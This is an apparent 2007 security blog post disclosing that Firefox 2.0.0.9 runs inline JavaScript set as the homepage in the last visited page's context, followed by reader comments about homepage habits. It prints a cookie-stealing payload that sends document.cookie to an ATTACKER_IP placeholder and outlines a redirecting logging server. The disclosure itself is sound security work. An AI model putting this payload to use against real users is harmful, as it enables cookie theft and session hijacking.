Firefox Homepage JavaScript Execution
Last month Yair Amit wrote a post about the wild behavior of Internet Explorer's Favorites. Now it's Firefox's turn in the spotlight as I noticed a feature which misbehaves. The feature is that Firefox (tested on version 2.0.0.9) permits you to set an inline JavaScript as a homepage.
The problem inherent with this is that the installed script is executed in the context of the last visited URL, giving an attacker the opportunity to access the domain of last the visited webpage.
For example, the attacker can run a specially crafted HTTP server which logs all incoming requests, and sends an HTTP Redirect reply that contains the victim's real homepage URL.
The attacker must then somehow convince the victim to change his homepage to javascript:location.href='http://<ATTACKER_IP>/'
+document.cookie
When the user clicks on the homepage button, he will be redirected to his original homepage, without noticing that his cookies have been stolen!
Although this is not an invisible attack, nor a very effective one (how often do you click on the Homepage button?), its strength is that it is persistent. Most people do not change their homepage frequently, so once the user has been lured into changing his homepage, months may pass before he discovers that his cookies have been stolen.
It should be mentioned that IE7 rejects inline JavaScripts in the homepage field, thus blocking this kind of attack.
Now it is Yair's turn to find a new vulnerability in Internet Explorer :)
"how often do you click on the Homepage button?"
About as often as I need to visit about:blank (ie: never).
Posted by: kingthorin | November 27, 2007 at 05:05 PM
""how often do you click on the Homepage button?"
About as often as I need to visit about:blank (ie: never)."
While mine's also about:blank and I removed the Homepage button from toolbar, I press Alt-Home more often than chaining Ctrl-T, Ctrl-Tab (set to last focused), Ctrl-W.
Posted by: gtanuel | November 29, 2007 at 02:47 AM
Well after reading this I was surprised about the topic. I figured a lot of people in the IT sector would be like you and I. But it seems the about:blank people are the minority. I posted on some forums and the vast majority have a set of bookmarks or a search engine as their homepage (home button URL) and actually use it. This concept boggles my mind (we're even talking about Firefox and other non-IE users). Personally if I need to search I hit alt+d (address bar) and tab over to the search field in FF. As for bookmarks I keep my daily visits on the linkbar and file everything else as actual bookmarks.
Posted by: kingthorin | November 29, 2007 at 03:22 PM
Google is my Homepage, and I'm proud of it!
Posted by: Ory Segal | November 30, 2007 at 10:59 PM